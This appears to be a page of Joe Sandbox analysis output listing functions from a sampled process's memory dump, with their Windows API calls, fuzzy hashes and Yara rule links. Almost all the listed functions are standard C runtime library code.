Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 2c2e4f80dfb9615e26c85b103b1db72ae1122f302d8e152d7fdb9bc28d241a05
Instruction ID: b396e6fcc4bd163734d2c9e1e71e0fa887f5d69565e70df7cfdfad407c9c2efd
Opcode Fuzzy Hash: 2c2e4f80dfb9615e26c85b103b1db72ae1122f302d8e152d7fdb9bc28d241a05
Instruction Fuzzy Hash: 84F03C72A41204DFDB12DF98E852B9D77B0EF48B61F10416AE401DB2D0C77949418F80

Function 00313086 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

EnumSystemLocalesW.KERNEL32(003130D1,00000001,?,?,?,00312B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 003130BD

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: d52c42d9d90d7deecd45006afd8bd2da9164664de6622483c3a870f700cf5472
Instruction ID: 7fc7db7775d601b4f4f8286e7051890dec56df3a11bfe1fdc5dc3ce24b74a132
Opcode Fuzzy Hash: d52c42d9d90d7deecd45006afd8bd2da9164664de6622483c3a870f700cf5472
Instruction Fuzzy Hash: 2CF0EC3570020557CB199F35DC557A67FD4EFC5710F074458EA068B251C67599C2C790

Function 0030F21C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,0030A4BC,?,20001004,00000000,00000002,?,?,003093CE), ref: 0030F250

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ee24f8770e02fa39778c680bf140022868cd5e22b03aa25d9fbe075cb0bd3f32
Instruction ID: b7575ce015377c62b57221d2bb487c368ef455464d46d585710b2717b9aeb5f8
Opcode Fuzzy Hash: ee24f8770e02fa39778c680bf140022868cd5e22b03aa25d9fbe075cb0bd3f32
Instruction Fuzzy Hash: 6EE04F3A502518BFCF332F60DC15AAE3F1DEF44B60F044424FD05655A1CB769921AAD5

Function 00305014 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 00305019

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4d75732834668d1140cc992e697e85d275acffda107c48cbd1ad579dbc71eda9
Instruction ID: 0bf50a6a54693ef304f66ca3e27c1e863f9aa691dac0305fa287531fb30f2036
Opcode Fuzzy Hash: 4d75732834668d1140cc992e697e85d275acffda107c48cbd1ad579dbc71eda9
Instruction Fuzzy Hash:

Function 0030FE2C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0030FE2C

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d4926b3ec0f299bff4145048100ff0c622536531e9ebc08ba8d0c176eea68775
Instruction ID: f5ad90a9b42b717e4a554866337efc107d4e6f5df195009be9b6f6b928c0b5b4
Opcode Fuzzy Hash: d4926b3ec0f299bff4145048100ff0c622536531e9ebc08ba8d0c176eea68775
Instruction Fuzzy Hash: E5A01230501100DB47128F316A0570C3A9C5906380B04401CA000C1020D72480815F00

Function 0031A222 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00A2FEE0,00A2FEE0,00000000,7FFFFFFF,?,0031A20D,00A2FEE0,00A2FEE0,00000000,00A2FEE0,?,?,?,?,00A2FEE0,00000000), ref: 0031A2C8
__alloca_probe_16.LIBCMT ref: 0031A383
__alloca_probe_16.LIBCMT ref: 0031A412
__freea.LIBCMT ref: 0031A45D
__freea.LIBCMT ref: 0031A463
__freea.LIBCMT ref: 0031A499
__freea.LIBCMT ref: 0031A49F
__freea.LIBCMT ref: 0031A4AF

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: a07c85beadde791df553c4758eed5d0d0f8ae4fd3a8cec2a41cd14cfc732553e
Instruction ID: 47555198e367d50acf32ee267725bbf530a91942974d10cb5a6ac3a768dace16
Opcode Fuzzy Hash: a07c85beadde791df553c4758eed5d0d0f8ae4fd3a8cec2a41cd14cfc732553e
Instruction Fuzzy Hash: C6712832A02A059BDF2B9F558C46BFF77BA9F4D312F254415E814AB381EB75CC808762

Function 003054C5 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0030550C
__alloca_probe_16.LIBCMT ref: 00305538
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00305577
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00305594
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003055D3
__alloca_probe_16.LIBCMT ref: 003055F0
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00305632
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00305655

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: c4b3ec10f1b1c7d5b10982da70513c687f36346fe721b84c5e91ac4984b5f613
Instruction ID: bf49fa0acad34eba26313d603ae602a8795d814c45e09c2ea133f05e128241fa
Opcode Fuzzy Hash: c4b3ec10f1b1c7d5b10982da70513c687f36346fe721b84c5e91ac4984b5f613
Instruction Fuzzy Hash: E551AE7260260AAFEF229F64CC55FBB7BA9EF40750F554429B9019A1D0DB32CD11CF90

Function 003061E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00306217
___except_validate_context_record.LIBVCRUNTIME ref: 0030621F
_ValidateLocalCookies.LIBCMT ref: 003062A8
__IsNonwritableInCurrentImage.LIBCMT ref: 003062D3
_ValidateLocalCookies.LIBCMT ref: 00306328

Strings

csm, xrefs: 003062BD

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f400ebd2a0721dfe954eb6acd94425a44feb9964b36d558e3cbef8628875f945
Instruction ID: 61d76a586d175b71ebb6ed10406724d84d94b436eda1ffd2c7403ee337718210
Opcode Fuzzy Hash: f400ebd2a0721dfe954eb6acd94425a44feb9964b36d558e3cbef8628875f945
Instruction Fuzzy Hash: AF41D534A022189FCF12DF68CCA2A9EBBB9EF45324F148955E8149B3D6C731DA11CBD0

Function 0030F469 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0030F578,0030186A,?,00000000,003031E1,0030186C,?,0030F1F6,00000022,FlsSetValue,0031DFE0,8,2,003031E1), ref: 0030F52A

Strings

ext-ms-, xrefs: 0030F4D4
api-ms-, xrefs: 0030F4C0

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b038e82fb019213768dbdc1b74dd9ddd9b12dd35825b02cd3b35ae6c38ef3673
Instruction ID: a88b8f4b77c4ef0fc257a8c21cc85db617ec9982a19760142948aca2d6a3d40f
Opcode Fuzzy Hash: b038e82fb019213768dbdc1b74dd9ddd9b12dd35825b02cd3b35ae6c38ef3673
Instruction Fuzzy Hash: 3321D532A02211AFC7339F69EC55AAB775CAF46764F260134ED16A76D0E734EE01C6D0

Function 0031625D Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54099dba6266393329954ee745da3645233f51cb1106d7b49e6d5c9c0a820dd8
Instruction ID: a2a6ddd451c8831b454619cc19d077603882c811842aae509e8af4fa2a78d96b
Opcode Fuzzy Hash: 54099dba6266393329954ee745da3645233f51cb1106d7b49e6d5c9c0a820dd8
Instruction Fuzzy Hash: F4B12570A04244AFDF1BDFE9D862BFD7BBAAF4E300F154159E4019B292CB709982CB51

Function 0030D2C0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0030D2B7,00305FB7,00305179), ref: 0030D2CE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0030D2DC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0030D2F5
SetLastError.KERNEL32(00000000,0030D2B7,00305FB7,00305179), ref: 0030D347

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 484c85d60a2f50d15e5c2f3b6030969e29b054dc610d9760df0dbbafb751c388
Instruction ID: e6b04e906ec372e84ecc4b9781ba39a4642c53716613381661c99a5ece056cfa
Opcode Fuzzy Hash: 484c85d60a2f50d15e5c2f3b6030969e29b054dc610d9760df0dbbafb751c388
Instruction Fuzzy Hash: BE01FC3620F7159ED63B17F47CD597B2ADCEB06774B24036DF110594E0EF214D855291

Function 0030DB88 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0030DCA7
CallUnexpected.LIBVCRUNTIME ref: 0030DF20

Strings

csm, xrefs: 0030DC32
csm, xrefs: 0030DCDE
csm, xrefs: 0030DBC5

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: b894e0ee776f6b451bb87b8dedcc19c5d4aaedd8bb0c84de807b30db2785ec1f
Instruction ID: 06cd8ab056a68b84190737f7ca94d0747dc846536d7169c759bbd03b404ae04a
Opcode Fuzzy Hash: b894e0ee776f6b451bb87b8dedcc19c5d4aaedd8bb0c84de807b30db2785ec1f
Instruction Fuzzy Hash: FCB16871802209EFCF2ADFE4C8A19AEBBF5FF14310B15455AE8016F286D771EA51CB91

Function 00308C55 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,375543C4,?,?,00000000,0031B774,000000FF,?,00308D16,00308BFD,?,00308DB2,00000000), ref: 00308C8A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00308C9C
FreeLibrary.KERNEL32(00000000,?,?,00000000,0031B774,000000FF,?,00308D16,00308BFD,?,00308DB2,00000000), ref: 00308CBE

Strings

CorExitProcess, xrefs: 00308C94
mscoree.dll, xrefs: 00308C83

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ad27731923205cdd9b9de6dce793c0534af367b28bacd43a993698d26f496cd5
Instruction ID: aa7c069e404292a4632b680b2ac6ba6dfd856a78aa7b8c9ceeb8cfc2c776884c
Opcode Fuzzy Hash: ad27731923205cdd9b9de6dce793c0534af367b28bacd43a993698d26f496cd5
Instruction Fuzzy Hash: FD01A771941615EFDB138B54DC09FEEB7BCFB45B11F000529F811A22D0DB749900CA90

Function 0030FC3D Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0030FCC2
__alloca_probe_16.LIBCMT ref: 0030FD8B
__freea.LIBCMT ref: 0030FDF2

Part of subcall function 0030E531: RtlAllocateHeap.NTDLL(00000000,003031E1,0030186A,?,003060C1,0030186C,0030186A,?,?,?,00303181,003031E1,0030186E,0030186A,0030186A,0030186A), ref: 0030E563

__freea.LIBCMT ref: 0030FE05
__freea.LIBCMT ref: 0030FE12

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 2fe57bf54440635b6391e5c672fa1de574960ea3b54f9fe67ba75c71bce6e532
Instruction ID: 4c599a52c02d686f7ab2ac67e0bde684711c9fe857542e68913a08d2c8844ea2
Opcode Fuzzy Hash: 2fe57bf54440635b6391e5c672fa1de574960ea3b54f9fe67ba75c71bce6e532
Instruction Fuzzy Hash: E051A272602206AFEB32AF65DCA5EBB76A9EF44710B160438FD04DA5D1EB34CC50D6A0

Function 00303010 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00303017
std::_Lockit::_Lockit.LIBCPMT ref: 00303022
std::_Lockit::~_Lockit.LIBCPMT ref: 00303090

Part of subcall function 00302EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00302EFC

std::locale::_Setgloballocale.LIBCPMT ref: 0030303D
_Yarn.LIBCPMT ref: 00303053

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 37ae440e1f6663b249f954a675317881a6da698b366b2cd68af727d8c0fbcad4
Instruction ID: cd8a9c333e22c3d1f8f4991dd488ff52e5f1013db1475c5a0c080521fcf63660
Opcode Fuzzy Hash: 37ae440e1f6663b249f954a675317881a6da698b366b2cd68af727d8c0fbcad4
Instruction Fuzzy Hash: FC018FB5A025249BCB1BEF60D86967E7769FF85740F14400DE8125B3C1CF346E42CB81

Function 00317E92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00317F2E,00000000,?,00326E10,?,?,?,00317E65,00000004,InitializeCriticalSectionEx,0031E57C,0031E584), ref: 00317E9F
GetLastError.KERNEL32(?,00317F2E,00000000,?,00326E10,?,?,?,00317E65,00000004,InitializeCriticalSectionEx,0031E57C,0031E584,00000000,?,0030E1DC), ref: 00317EA9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00317ED1

Strings

api-ms-, xrefs: 00317EB6

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 23c6ed9de192ef25479f4f4ef3690591d04fe5731e100140d3b71ae9375183c4
Instruction ID: 2b5a2ab9953e739f93f0e958067254a7c20a628935046b149e4a7f07f447a2b1
Opcode Fuzzy Hash: 23c6ed9de192ef25479f4f4ef3690591d04fe5731e100140d3b71ae9375183c4
